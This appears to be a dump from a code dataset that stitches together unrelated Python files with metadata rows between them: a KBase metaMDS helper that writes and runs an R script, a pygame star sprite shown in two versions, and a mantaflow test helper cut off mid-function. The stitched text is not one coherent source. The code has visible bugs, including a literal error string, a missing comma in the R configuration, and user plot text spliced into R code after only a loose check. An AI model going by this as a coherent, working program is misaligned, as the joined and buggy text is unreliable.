def _mkdir_p(self, path):
"""
_mkdir_p: make directory for given path
"""
if not path:
return
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def _validate_run_mds_params(self, params):
"""
_validate_run_mds_params:
validates params passed to run_mds method
"""
logging.info('start validating run_mds params')
# check for required parameters
for p in [self.PARAM_IN_MATRIX, self.PARAM_IN_WS, self.PARAM_OUT_MATRIX]:
if p not in params:
raise ValueError('"{}" parameter is required, but missing'.format(p))
def _build_rMDS_script(self, params):
"""
_build_rMDS_script: build a sequence of R command calls according to params
Note: To run the NMDS, we will use the function metaMDS from the vegan package.
# The metaMDS function requires only a community-by-species matrix.
"""
data_file_path = params.get('datafile', None)
if not data_file_path:
return ''
exists = os.path.isfile(os.path.join(self.output_dir, os.path.basename(data_file_path)))
if not exists:
shutil.copyfile(data_file_path,
os.path.join(self.output_dir, os.path.basename(data_file_path)))
n_components = params.get('n_components', 2)
max_iter = params.get('max_iter', 300)
run_metric = True if params.get('metric', 0) else False
dist_metric = params.get('distance_metric', 'bray')
mds_cfg = 'distance="' + dist_metric + '",try=20,trymax=' + str(max_iter) + \
',autotransform=TRUE,noshare=0.1,expand=TRUE,trace=1,' + \
'plot=FALSE,engine=c("monoMDS","isoMDS"),k=' + str(n_components)
if run_metric:
mds_cfg += 'metric=True'
mds_scrpt = 'library(vegan)\n'
mds_scrpt += 'library(jsonlite)\n'
mds_scrpt += 'vg_data <- read.table("' + data_file_path + \
'",header=TRUE,row.names=1,sep="")\n'
# remove the last (taxonomy) column
# mds_scrpt += 'vg_data<-vg_data[,1:dim(vg_data)[2]-1]\n'
# Function metaMDS returns an object of class metaMDS.
mds_scrpt += 'vg_data.mds <- metaMDS(vg_data,' + mds_cfg + ')\n'
mds_scrpt += 'vg_data.mds\n'
# save the results in the memory
# 1) store species ordination
mds_scrpt += 'variableScores <- vg_data.mds$species\n'
# 2) store site ordination
mds_scrpt += 'sampleScores <- vg_data.mds$points\n'
# 3) store other ordination results
mds_scrpt += 'stress <- vg_data.mds$stress\n'
mds_scrpt += 'dist_metric <- vg_data.mds$distance\n'
mds_scrpt += 'dist_matrix <- vg_data.mds$diss\n'
mds_scrpt += 'dist_call <- vg_data.mds$distcall\n'
mds_scrpt += 'converged <- vg_data.mds$converged\n'
mds_scrpt += 'dims <- vg_data.mds$ndim\n'
mds_scrpt += 'tries <- vg_data.mds$tries\n'
mds_scrpt += 'maxits <- vg_data.mds$maxits\n'
mds_scrpt += 'func_call <- vg_data.mds$call\n'
mds_scrpt += 'mds_data <- vg_data.mds$data\n'
# save the results to the current dir
# Write CSV in R
mds_scrpt += 'write.csv(dist_matrix,file="dist_matrix.csv",row.names=TRUE,na="")\n'
mds_scrpt += 'write.csv(variableScores,file="species_ordination.csv",' + \
'row.names=TRUE,na="")\n'
mds_scrpt += 'write.csv(sampleScores,file="site_ordination.csv",row.names=TRUE,na="")\n'
# Write JSON in R
mds_scrpt += 'write_json(toJSON(dist_matrix),path="dist_matrix.json",pretty=TRUE,' + \
'auto_unbox=FALSE)\n'
mds_scrpt += 'write_json(toJSON(variableScores),path="species_ordination.json",' + \
'pretty=TRUE,auto_unbox=FALSE)\n'
mds_scrpt += 'write_json(toJSON(sampleScores),path="site_ordination.json",' + \
'pretty=TRUE,auto_unbox=FALSE)\n'
mds_scrpt += 'item_name=c("stress","distance_metric","dist_call","converged",' + \
'"dimesions","trials","maxits")\n'
mds_scrpt += 'item_value=c(stress,dist_metric,dist_call,converged,dims,tries,maxits)\n'
mds_scrpt += 'df <- data.frame(item_name,item_value,stringsAsFactors=FALSE)\n'
mds_scrpt += 'write_json(toJSON(df),path="others.json",pretty=TRUE,auto_unbox=FALSE)\n'
# save mds plots
mds_scrpt += 'bmp(file="saving_mds_plot.bmp",width=580,height=580,units="px",' + \
'res=100, pointsize=12)\n'
mds_scrpt += 'plot(vg_data.mds,type="n",display="sites")\n'
mds_scrpt += 'points(vg_data.mds)\n'
mds_scrpt += 'dev.off()\n'
mds_scrpt += 'pdf(file="saving_mds_plot.pdf",width=6,height=6)\n'
mds_scrpt += 'plot(vg_data.mds,type="n",display="sites")\n'
mds_scrpt += 'points(vg_data.mds)\n'
mds_scrpt += 'dev.off()\n'
mds_scrpt += 'pdf(file="mds_plot_withlabel.pdf",width=6,height=6)\n'
mds_scrpt += 'plot(vg_data.mds,type="n",display="sites")\n'
mds_scrpt += 'ordilabel(vg_data.mds,dis="sites",cex=1.2,font=3,fill="hotpink",col="blue")\n'
mds_scrpt += 'dev.off()\n'
mds_scrpt += 'pdf(file="mds_plot_withcolor.pdf",width=6,height=6)\n'
mds_scrpt += 'fig <- ordiplot(vg_data.mds,type="none")\n'
mds_scrpt += 'points(fig,"sites",pch=21,col="red",bg="yellow")\n'
mds_scrpt += 'points(fig,"species",pch=21,col="green",bg="blue")\n'
# mds_scrpt += 'text(fig, "species", col="blue", cex=0.9)\n'
mds_scrpt += 'dev.off()\n'
# If there is user input plotting script:
plt_scrpt = params.get('plot_script', '').lower()
if plt_scrpt and re.match("^plot\(\s*[a-zA-Z]+.*\)$", plt_scrpt):
arr_plt = plt_scrpt.split(',')
arr_plt[0] = 'plot(vg_data.mds' # make sure to pass the correct data
plt_scrpt = (',').join(arr_plt)
if len(arr_plt) == 1:
plt_scrpt += ')'
plt_type = params.get('plot_type', 'pdf').lower()
if not plt_type:
plt_type = 'pdf'
plt_name = params.get('plot_name', 'usr_plt_name').lower()
if not plt_name:
plt_name = 'usr_plt_name'
plt_name += '.' + plt_type
if plt_type == 'jpg':
plt_type = 'jpeg'
if plt_type == 'ps':
plt_type = 'postscript'
mds_scrpt += plt_type
mds_scrpt += '(file="' + plt_name + '")\n'
if plt_type == 'tiff':
mds_scrpt += plt_type
mds_scrpt += '(file="' + plt_name + '",width=4,height=4,units="in",' + \
'compression="lzw",res=300)\n'
if plt_type in ['jpg', 'jpeg', 'bmp', 'png']:
mds_scrpt += plt_type
mds_scrpt += '(file="' + plt_name + '",width=580,height=580,units="px",' + \
'res=100, pointsize=12)\n'
mds_scrpt += plt_scrpt + '\n'
mds_scrpt += 'dev.off()\n'
logging.info('R script: {}'.format(mds_scrpt))
mds_rscript = 'mds_script.R'
rscrpt_file_path = os.path.join(self.output_dir, mds_rscript)
with open(rscrpt_file_path, 'w') as r_file:
r_file.write(mds_scrpt)
return rscrpt_file_path
def _execute_r_script(self, rfile_name):
"""
_execute_r_script: Calling the Rscript executable to run the R script in rfile_name
"""
logging.info('Calling R......')
result_dir = os.path.dirname(rfile_name)
if not result_dir:
result_dir = self.working_dir
rcmd = [os.path.join(self.R_BIN, 'Rscript')]
rcmd.append(rfile_name)
logging.info('Running metaMDS script in current working directory: {}'.format(result_dir))
exitCode = 0
try:
complete_proc = subprocess.run(rcmd, cwd=result_dir, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
close_fds=True)
exitCode = complete_proc.returncode
if (exitCode == 0):
logging.info('\n{}'.format(complete_proc.stdout))
logging.info('\n{} was executed successfully, exit code was: {}'.format(
' '.join(rcmd), str(exitCode)))
logging.info("Finished calling R.")
else:
logging.info('Error running command: {} Exit Code: '.format(
' '.join(rcmd), str(exitCode)))
logging.info('\n{}'.format(complete_proc.stderr))
except subprocess.CalledProcessError as sub_e:
exitCode = -99
logging.info('Caught subprocess.CalledProcessError {}'.format(sub_e))
return exitCode
def _df_to_list(self, df):
"""
_df_to_list: convert Dataframe to FloatMatrix2D matrix data
"""
df.index = df.index.astype('str')
df.columns = df.columns.astype('str')
df.fillna(0, inplace=True)
matrix_data = {'row_ids': df.index.tolist(),
'col_ids': df.columns.tolist(),
'values': df.values.tolist()}
return matrix_data
def _mds_df_to_excel(self, mds_df, distance_df, result_dir, mds_matrix_ref):
"""
write MDS matrix df into excel
"""
logging.info('writting mds data frame to excel file')
mds_matrix_obj = self.dfu.get_objects({'object_refs': [mds_matrix_ref]})['data'][0]
mds_matrix_info = mds_matrix_obj['info']
mds_matrix_name = mds_matrix_info[1]
file_path = os.path.join(result_dir, mds_matrix_name + ".xlsx")
writer = pd.ExcelWriter(file_path)
mds_df.to_excel(writer, "mds_matrix", index=True)
if distance_df:
distance_df.to_excel(writer, "mds_distance_matrix", index=True)
writer.close()
def _Matrix2D_to_df(self, Matrix2D):
"""
_Matrix2D_to_df: transform a FloatMatrix2D to data frame
"""
index = Matrix2D.get('row_ids')
columns = Matrix2D.get('col_ids')
values = Matrix2D.get('values')
df = pd.DataFrame(values, index=index, columns=columns)
return df
def _mds_to_df(self, mds_matrix_ref):
"""
retrieve MDS matrix ws object to mds_df
"""
logging.info('converting mds matrix to data frame')
mds_data = self.dfu.get_objects({'object_refs': [mds_matrix_ref]})['data'][0]['data']
rotation_matrix_data = mds_data.get('rotation_matrix')
distance_matrix_data = mds_data.get('distance_matrix')
original_matrix_ref = mds_data.get('original_matrix_ref')
dimension = mds_data.get('mds_parameters').get('n_components')
mds_df = self._Matrix2D_to_df(rotation_matrix_data)
distance_df = None
if distance_matrix_data:
distance_df = self._Matrix2D_to_df(distance_matrix_data)
if original_matrix_ref:
logging.info('appending instance group information to mds data frame')
obj_data = self.dfu.get_objects(
{'object_refs': [original_matrix_ref]})['data'][0]['data']
attributemapping_ref = obj_data.get('{}_attributemapping_ref'.format(dimension))
am_data = self.dfu.get_objects(
{'object_refs': [attributemapping_ref]})['data'][0]['data']
attributes = am_data.get('attributes')
instances = am_data.get('instances')
am_df = pd.DataFrame(data=list(instances.values()),
columns=list(map(lambda x: x.get('attribute'), attributes)),
index=instances.keys())
mds_df = mds_df.merge(am_df, left_index=True, right_index=True, how='left',
validate='one_to_one')
return mds_df, distance_df
def _save_mds_matrix(self, workspace_name, input_obj_ref, mds_matrix_name,
distance_df, mds_params_df, site_ordin_df, species_ordin_df):
logging.info('Saving MDSMatrix...')
if not isinstance(workspace_name, int):
ws_name_id = self.dfu.ws_name_to_id(workspace_name)
else:
ws_name_id = workspace_name
mds_data = {}
mds_data.update({'distance_matrix': self._df_to_list(distance_df)})
mds_data.update({'site_ordination': self._df_to_list(site_ordin_df)})
mds_data.update({'species_ordination': self._df_to_list(species_ordin_df)})
mds_data.update({'mds_parameters': self._df_to_list(mds_params_df)})
mds_data.update({'original_matrix_ref': input_obj_ref})
mds_data.update({'rotation_matrix': self._df_to_list(distance_df)})
obj_type = 'KBaseExperiments.PCAMatrix'
info = self.dfu.save_objects({
"id": ws_name_id,
"objects": [{
"type": obj_type,
"data": mds_data,
"name": mds_matrix_name
}]
})[0]
return "%s/%s/%s" % (info[6], info[0], info[4])
def _zip_folder(self, folder_path, output_path):
"""
_zip_folder: Zip the contents of an entire folder (with that folder included in the
archive). Empty subfolders could be included in the archive as well if the 'Included
all subfolders, including empty ones' portion.
portion is used.
"""
with zipfile.ZipFile(output_path, 'w',
zipfile.ZIP_DEFLATED,
allowZip64=True) as ziph:
for root, folders, files in os.walk(folder_path):
# Include all subfolders, including empty ones.
for folder_name in folders:
absolute_fpath = os.path.join(root, folder_name)
relative_fpath = os.path.join(os.path.basename(root), folder_name)
logging.info("Adding folder {} to archive.".format(absolute_fpath))
ziph.write(absolute_fpath, relative_fpath)
for f in files:
absolute_path = os.path.join(root, f)
relative_path = os.path.join(os.path.basename(root), f)
logging.info("Adding file {} to archive.".format(absolute_path))
ziph.write(absolute_path, relative_path)
logging.info("{} created successfully.".format(output_path))
def _generate_output_file_list(self, out_dir):
"""
_generate_output_file_list: zip result files and generate file_links for report
"""
logging.info('Start packing result files from MDS...')
output_files = list()
output_dir = os.path.join(self.working_dir, str(uuid.uuid4()))
self._mkdir_p(output_dir)
mds_output = os.path.join(output_dir, 'metaMDS_output.zip')
self._zip_folder(out_dir, mds_output)
output_files.append({'path': mds_output,
'name': os.path.basename(mds_output),
'label': os.path.basename(mds_output),
'description': 'Output file(s) generated by metaMDS'})
return output_files
def _generate_mds_html_report(self, mds_outdir, n_components):
logging.info('Start generating html report for MDS results...')
html_report = list()
result_dir = os.path.join(self.working_dir, str(uuid.uuid4()))
self._mkdir_p(result_dir)
result_file_path = os.path.join(result_dir, 'mds_result.html')
mds_plots = list()
for root, folders, files in os.walk(mds_outdir):
# Find the image files by their extensions.
for f in files:
if re.match('^[a-zA-Z]+.*.(jpeg|jpg|bmp|png|tiff|pdf|ps)$', f):
absolute_path = os.path.join(root, f)
logging.info("Adding file {} to plot archive.".format(absolute_path))
mds_plots.append(absolute_path)
visualization_content = ''
for mds_plot in mds_plots:
shutil.copy2(mds_plot,
os.path.join(result_dir, os.path.basename(mds_plot)))
visualization_content += '<iframe height="900px" width="100%" '
visualization_content += 'src="{}" '.format(os.path.basename(mds_plot))
visualization_content += 'style="border:none;"></iframe>\n<p></p>\n'
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'mds_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
report_template = report_template.replace('n_components',
'{} Components'.format(n_components))
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': result_dir,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for MDS Matrix App'
})
return html_report
def _generate_mds_report(self, mds_ref, output_dir, workspace_name, n_components):
logging.info('Creating MDS report...')
output_files = self._generate_output_file_list(output_dir)
output_html_files = self._generate_mds_html_report(output_dir, n_components)
objects_created = list()
objects_created.append({'ref': mds_ref,
'description': 'MDS Matrix'})
report_params = {'message': '',
'workspace_name': workspace_name,
'file_links': output_files,
'objects_created': objects_created,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 666,
'report_object_name': 'kb_mds_report_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def __init__(self, config):
self.ws_url = config["workspace-url"]
self.callback_url = config['SDK_CALLBACK_URL']
self.token = config['KB_AUTH_TOKEN']
self.scratch = config['scratch']
self.dfu = DataFileUtil(self.callback_url, service_ver='release')
self.working_dir = self.scratch
self.data_util = DataUtil(config)
self.dfu = DataFileUtil(self.callback_url)
self.output_dir = os.path.join(self.working_dir, self.MDS_OUT_DIR)
self._mkdir_p(self.output_dir)
def run_metaMDS(self, params):
"""
run_metaMDS: perform metaMDS analysis on matrix
:param input_obj_ref: object reference of a matrix
:param workspace_name: the name of the workspace
:param mds_matrix_name: name of MDS (KBaseExperiments.MDSMatrix) object
dimension: compute correlation on column or row, one of ['col', 'row']
:param n_components - dimentionality of the reduced space (default 2)
:param max_iter: maximum iterations allowed
:param metric: indication of running metric or non-metric MDS
:param distance_metric: distance the ordination will be performed on, default to "bray"
"""
logging.info('--->\nrunning metaMDS with input\n' +
'params:\n{}'.format(json.dumps(params, indent=1)))
self._validate_run_mds_params(params)
input_obj_ref = params.get(self.PARAM_IN_MATRIX)
workspace_name = params.get(self.PARAM_IN_WS)
mds_matrix_name = params.get(self.PARAM_OUT_MATRIX)
dimension = params.get('dimension', 'row')
n_components = int(params.get('n_components', 2))
res = self.dfu.get_objects({'object_refs': [input_obj_ref]})['data'][0]
obj_data = res['data']
obj_name = res['info'][1]
obj_type = res['info'][2]
max_size = len(obj_data['data']['col_ids'])
if n_components > max_size:
raise ValueError('Number of components should be less than number of samples')
exitCode = -99
if "KBaseMatrices" in obj_type:
# create the input file from obj_data
matrix_tab = obj_data['data']['values']
row_ids = obj_data['data']['row_ids']
col_ids = obj_data['data']['col_ids']
matrix_df = pd.DataFrame(matrix_tab, index=row_ids, columns=col_ids)
matrix_data_file = os.path.join(self.output_dir, obj_name + '.csv')
with open(matrix_data_file, 'w') as m_file:
matrix_df.to_csv(m_file, sep='\t')
params['datafile'] = matrix_data_file
exitCode = self.run_metaMDS_with_file(params)
else:
err_msg = 'Ooops! [{}] is not supported.\n'.format(obj_type)
err_msg += 'Please provide a KBaseMatrices object'
raise ValueError("err_msg")
if exitCode == -99:
raise ValueError('Caught subprocess.CalledProcessError while calling R.')
# saving the mds_matrix object
# read metaMDS results from files into data frames
dist_matrix_df = pd.read_csv(os.path.join(self.output_dir, "dist_matrix.csv"))
mds_params_df = pd.read_json(os.path.join(self.output_dir, "others.json"))
site_ordin_df = pd.read_csv(os.path.join(self.output_dir, "site_ordination.csv"))
species_ordin_df = pd.read_csv(os.path.join(self.output_dir, "species_ordination.csv"))
mds_ref = self._save_mds_matrix(workspace_name, input_obj_ref, mds_matrix_name,
dist_matrix_df, mds_params_df, site_ordin_df,
species_ordin_df)
returnVal = {'mds_ref': mds_ref}
# generating report
report_output = self._generate_mds_report(mds_ref, self.output_dir,
workspace_name, n_components)
returnVal.update(report_output)
return returnVal
def run_metaMDS_with_file(self, params):
"""
run_metaMDS_with_file: perform metaMDS analysis on matrix
:param datafile: a file that contains the matrix data
:param workspace_name: the name of the workspace
:param mds_matrix_name: name of MDS (KBaseExperiments.MDSMatrix) object
:param n_components - dimentionality of the reduced space (default 2)
:param max_iter: maximum iterations allowed
:param metric: indication of running metric or non-metric MDS
:param distance_metric: distance the ordination will be performed on, default to "bray"
"""
logging.info('--->\nrunning metaMDS with input \n' +
'params:\n{}'.format(json.dumps(params, indent=1)))
rscrpt_file = self._build_rMDS_script(params)
logging.info('--->\nR script file has been written to {}'.format(rscrpt_file))
return self._execute_r_script(rscrpt_file)
def export_mds_matrix_excel(self, params):
"""
export MDSMatrix as Excel
"""
logging.info('start exporting mds matrix')
mds_matrix_ref = params.get('input_ref')
mds_df, components_df = self._mds_to_df(mds_matrix_ref)
result_dir = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(result_dir)
self._mds_df_to_excel(mds_df, components_df, result_dir, mds_matrix_ref)
package_details = self.dfu.package_for_download({
'file_path': result_dir,
'ws_refs': [mds_matrix_ref]
})
return {'shock_id': package_details['shock_id']}
def test_run_metaMDS(self, params):
input_obj_ref = params.get(self.PARAM_IN_MATRIX)
workspace_name = params.get(self.PARAM_IN_WS)
mds_matrix_name = params.get(self.PARAM_OUT_MATRIX)
dimension = params.get('dimension', 'row')
n_components = int(params.get('n_components', 2))
color_marker = params.get('color_marker_by')
scale_seize = params.get('scale_size_by')
for item in [input_obj_ref, workspace_name, mds_matrix_name, dimension, n_components, color_marker, scale_seize]:
print(item)
| 5,705 | 19,790 | 23 |
87da8a733dcef29dd32be297bf9fda26b92a975c | 1,525 | py | Python | CursoIntensivoPython/alien_invasion/exercicio/star.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | CursoIntensivoPython/alien_invasion/exercicio/star.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | CursoIntensivoPython/alien_invasion/exercicio/star.py | SweydAbdul/estudos-python | b052708d0566a0afb9a1c04d035467d45f820879 | [
"MIT"
] | null | null | null | import pygame
from pygame.sprite import Sprite
import sys
class Estrela(Sprite):
"""Uma classe que representa uma unica estrela"""
def __init__(self, tela, janela):
"""Inicializa a estrela e define sua posicao inicial."""
super(Estrela, self).__init__()
self.janela = janela
self.tela = tela
# Carrega a imagem do alienigena e define seu atributo rect
self.imagem = pygame.image.load('emoji.png')
self.imagem = pygame.transform.scale(self.imagem, [15, 15])
self.rect = pygame.Rect(0, 0, 0, 0)
# Inica cada novo estrela a parte superios da tela
# Armazena a posicao exata da estrela
self.x = float(self.rect.x)
def desenha_estrela(self):
"""Desenha a estrela em sua posicao actual"""
if self.janela[0] > self.rect.x:
self.rect.x += 30
self.tela.blit(self.imagem, self.rect)
print('desenhei x')
elif self.janela[1] > self.rect.y:
self.rect.x = 0
self.rect.y += 30
inicia_jogo() | 26.754386 | 67 | 0.602623 | import pygame
from pygame.sprite import Sprite
import sys
class Estrela(Sprite):
    """Single star sprite that sweeps across the window row by row."""

    def __init__(self, tela, janela):
        """Set up the star image, its rect, and its starting position."""
        super().__init__()
        self.janela = janela
        self.tela = tela
        # Load the sprite image and shrink it to a 15x15 thumbnail.
        self.imagem = pygame.image.load('emoji.png')
        self.imagem = pygame.transform.scale(self.imagem, [15, 15])
        self.rect = pygame.Rect(0, 0, 0, 0)
        # Exact horizontal position kept as a float.
        self.x = float(self.rect.x)

    def desenha_estrela(self):
        """Advance the star one step, blitting it while inside the row."""
        inside_row = self.janela[0] > self.rect.x
        if inside_row:
            self.rect.x += 30
            self.tela.blit(self.imagem, self.rect)
            print('desenhei x')
        elif self.janela[1] > self.rect.y:
            # Past the right edge: wrap to the start of the next 30px row.
            self.rect.x = 0
            self.rect.y += 30
def inicia_jogo():
    """Open the game window and run the main loop drawing a single star."""
    pygame.init()
    tela_altura = 600
    tela_largura = 1200
    janela = (tela_largura, tela_altura)
    tela = pygame.display.set_mode((tela_largura, tela_altura))
    cor = 0, 0, 0
    tela.fill(cor)
    estrela = Estrela(tela, janela)
    # Event loop: runs until the window is closed (sys.exit on QUIT).
    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                sys.exit()
        estrela.desenha_estrela()
        pygame.display.flip()
inicia_jogo() | 431 | 0 | 23 |
023de8aa7308628a653ef21d3dd78f164e3e9392 | 9,144 | py | Python | tools/tests/helperInclude.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 158 | 2018-06-24T17:42:13.000Z | 2022-03-12T13:29:43.000Z | tools/tests/helperInclude.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 5 | 2018-09-05T07:30:48.000Z | 2020-07-01T08:56:28.000Z | tools/tests/helperInclude.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 35 | 2018-06-13T04:05:42.000Z | 2022-03-29T16:55:24.000Z | #
# Helper functions for test runs in mantaflow
#
from manta import *
import os
import shutil
import re
from helperGeneric import *
# ------------------------------------------------------------------------------------------
# test result checking
# global var to print manta version once per test
printVersion = 1
# compare a grid, in generation mode (MANTA_GEN_TEST_DATA=1) it
# creates the data on disk, otherwise it loads the disk data,
# computes the largest per cell error, and checks whether it matches
# the allowed thresholds
#
# note, there are two thresholds:
# - the "normal" one is intended for comparing single precision calculations across different compilers
# - the "strict" one for double precision compiles (detected automatically)
# - the "grid" object can be either a Grid<T>, or a ParticleDataImpl<T> ; parent is either FluidSolver or ParticleSystem
#
# ------------------------------------------------------------------------------------------
# smaller helpers (directories, global settings)
# for xl test, load test data afterwards to keep sims in sync
# reset and generate info file with version string when in data gen mode
# read test data
# try to load uni file if it exists
# configure input filenames
# try to load uni file if it exists
| 36.722892 | 141 | 0.675962 | #
# Helper functions for test runs in mantaflow
#
from manta import *
import os
import shutil
import re
from helperGeneric import *
# ------------------------------------------------------------------------------------------
# test result checking
def checkResult( name, result, resultRel , thresh, threshStrict, invertResult=False ):
    """Compare a measured error against the allowed threshold and report.

    Args:
        name: label printed with the check.
        result: absolute per-cell error measured.
        resultRel: relative error, used only in the failure message.
        thresh: allowed threshold for single-precision builds.
        threshStrict: tighter threshold used for double-precision builds.
        invertResult: when True, the check is expected to fail (pass/fail
            is inverted).

    Returns:
        0 when the check passes, 1 when it fails.
    """
    curr_thresh = thresh
    # enable strict thresholds for double prec tests
    if(getFloatSetting()==2):
        curr_thresh = threshStrict
    print ("Checking '%s', result=%f , thresh=%f" % ( name , result , curr_thresh) )
    # BUGFIX: test the tighter 1e-08 band first; previously the 1e-04 branch
    # was checked first, which made the 1e-08 branch unreachable.
    if ( ( result > 0.) and (result < 1e-08) ):
        print ("Note: small difference: %f (output scaled by 1e9)" % ( result * 1e09 ) ) # debugging...
    elif ( ( result > 0.) and (result < 1e-04) ):
        print ("Note: small difference: %f (output scaled by 1e5)" % ( result * 1e05 ) ) # debugging...
    allGood = 0
    if ( result <= curr_thresh) :
        allGood = 1
    # for checks that should fail
    if ( invertResult == True) :
        if ( allGood == 0) :
            allGood = 1
        else:
            allGood = 0
    # now react on outcome...
    if ( allGood == 1 ):
        print("OK! Results for "+name+" match...")
        return 0
    else:
        print("FAIL! Allowed "+name+" threshold "+str(curr_thresh)+", results differ by "+str(result) +" (abs) , and by "+str(resultRel)+" (rel)" )
        return 1
# global var to print manta version once per test
printVersion = 1
# compare a grid, in generation mode (MANTA_GEN_TEST_DATA=1) it
# creates the data on disk, otherwise it loads the disk data,
# computes the largest per cell error, and checks whether it matches
# the allowed thresholds
#
# note, there are two thresholds:
# - the "normal" one is intended for comparing single precision calculations across different compilers
# - the "strict" one for double precision compiles (detected automatically)
# - the "grid" object can be either a Grid<T>, or a ParticleDataImpl<T> ; parent is either FluidSolver or ParticleSystem
#
def doTestGrid( file , name, parent , grid, threshold=0, thresholdStrict=0, invertResult=False, debugShowDifference=False ):
    """Generate or verify reference data for a grid / particle-data object.

    In generation mode (MANTA_GEN_TEST_DATA=1) the grid is saved to disk as
    the new reference; otherwise the stored reference is loaded and the
    maximum per-cell difference is checked against the threshold via
    checkResult(). Returns 0 on success, 1 on failure.

    parent is a FluidSolver for Grid objects or a BasicParticleSystem for
    ParticleDataImpl objects; threshold/thresholdStrict must be given
    together (strict is used for double-precision builds).
    """
    global printVersion
    # both always have to given together (if not default)
    if ( threshold!=0 and thresholdStrict==0 ):
        print( "Error doTestGrid - give both thresholds at the same time...")
        return 1
    if ( threshold==0 and thresholdStrict!=0 ):
        print( "Error doTestGrid - give both thresholds at the same time...")
        return 1
    if getVisualSetting():
        print( "Visual mode, skipping data file checks" )
        return 0
    # handle grid types that need conversion: MAC and levelset grids are
    # copied into plain Vec3/Real grids, then we recurse on the copy
    #print( "doTestGrid, incoming grid type :" + type(grid).__name__ + " class:"+grid._class+ " T:"+grid._T )
    if ( type(grid).__name__ == "MACGrid" ):
        gridTmpMac = parent.create(VecGrid)
        copyMacToVec3(grid , gridTmpMac )
        ret = doTestGrid( file, name, parent, gridTmpMac , threshold, thresholdStrict, invertResult, debugShowDifference)
        if debugShowDifference: grid.copyFrom( gridTmpMac )
        return ret
    if ( type(grid).__name__ == "LevelsetGrid" ):
        gridTmpLs = parent.create(RealGrid)
        copyLevelsetToReal(grid , gridTmpLs )
        ret = doTestGrid( file, name, parent, gridTmpLs , threshold, thresholdStrict, invertResult, debugShowDifference)
        if debugShowDifference: grid.copyFrom( gridTmpLs )
        return ret
    # now we should only have real & vec3 grids
    # sanity check data type & parent
    if ( grid._class == "Grid" and parent._class != "FluidSolver" ):
        print( "Error doTestGrid - pass fluid solver as parent for grids, is '"+ parent._class +"'" );
        return 1
    if ( grid._class == "ParticleDataImpl" and parent._class != "BasicParticleSystem" ):
        print( "Error doTestGrid - pass particle system as parent for pdata" );
        return 1
    # create temp grid (parent can be either fluid solver or particle system)
    if ( grid._class == "Grid" and grid._T == "Real" ):
        compareTmpGrid = parent.create(RealGrid)
    elif ( grid._class == "Grid" and grid._T == "Vec3" ):
        compareTmpGrid = parent.create(VecGrid)
    elif ( grid._class == "Grid" and grid._T == "int" ):
        compareTmpGrid = parent.create(IntGrid)
    elif ( grid._class == "ParticleDataImpl" and grid._T == "Real" ):
        compareTmpGrid = parent.create(PdataReal)
    elif ( grid._class == "ParticleDataImpl" and grid._T == "Vec3" ):
        compareTmpGrid = parent.create(PdataVec3)
    elif ( grid._class == "ParticleDataImpl" and grid._T == "int" ):
        compareTmpGrid = parent.create(PdataInt)
    elif ( grid._class == "Grid4d" and grid._T == "Real" ):
        compareTmpGrid = parent.create(Grid4Real)
    elif ( grid._class == "Grid4d" and grid._T == "int" ):
        compareTmpGrid = parent.create(Grid4Int)
    elif ( grid._class == "Grid4d" and grid._T == "Vec3" ):
        compareTmpGrid = parent.create(Grid4Vec3)
    elif ( grid._class == "Grid4d" and grid._T == "Vec4" ):
        compareTmpGrid = parent.create(Grid4Vec4)
    else:
        print( "Error doTestGrid - unknown grid type " + type(grid).__name__+ " class:"+grid._class+ " T:"+grid._T )
        return 1
    genRefFiles = getGenRefFileSetting()
    fname = referenceFilename( file, name )
    if (genRefFiles==1):
        # generation mode: write the current grid as the new reference
        grid.save( fname )
        print( "OK! Generated reference file '" + fname + "'")
        # test data generation log
        if 1:
            infofilename = dataDirectory(file)+"/test_data_info.txt"
            text_file = open(dataDirectory(file)+"/test_data_info.txt", "a");
            if printVersion:
                # only log the build info once per test run
                printVersion = 0
                text_file.write( "\n%s, %s\n" % (file, str(printBuildInfo())) );
            text_file.write( "   %s\n" % ( fname ) );
            text_file.close();
        return 0
    else:
        # give error if file doesnt exist
        if( not os.path.isfile( fname ) ):
            print( "Error - unable to load test file %s" % referenceFilename( file, name ) )
            print("FAIL! Reference data missing..." );
            return 1
        compareTmpGrid.load( fname )
        # pick the max-difference function matching the grid's type
        errVal = 1e10
        if ( grid._class == "Grid" and grid._T == "Real" ):
            errVal = gridMaxDiff    ( grid, compareTmpGrid )
        elif ( grid._class == "Grid" and grid._T == "Vec3" ):
            errVal = gridMaxDiffVec3( grid, compareTmpGrid )
        elif ( grid._class == "Grid" and grid._T == "int" ):
            errVal = gridMaxDiffInt ( grid, compareTmpGrid )
        elif ( grid._class == "ParticleDataImpl" ):
            errVal = pdataMaxDiff ( grid, compareTmpGrid )
        elif ( grid._class == "Grid4d" and grid._T == "Real" ):
            errVal = grid4dMaxDiff    ( grid, compareTmpGrid )
        elif ( grid._class == "Grid4d" and grid._T == "int" ):
            errVal = grid4dMaxDiffInt ( grid, compareTmpGrid )
        elif ( grid._class == "Grid4d" and grid._T == "Vec3" ):
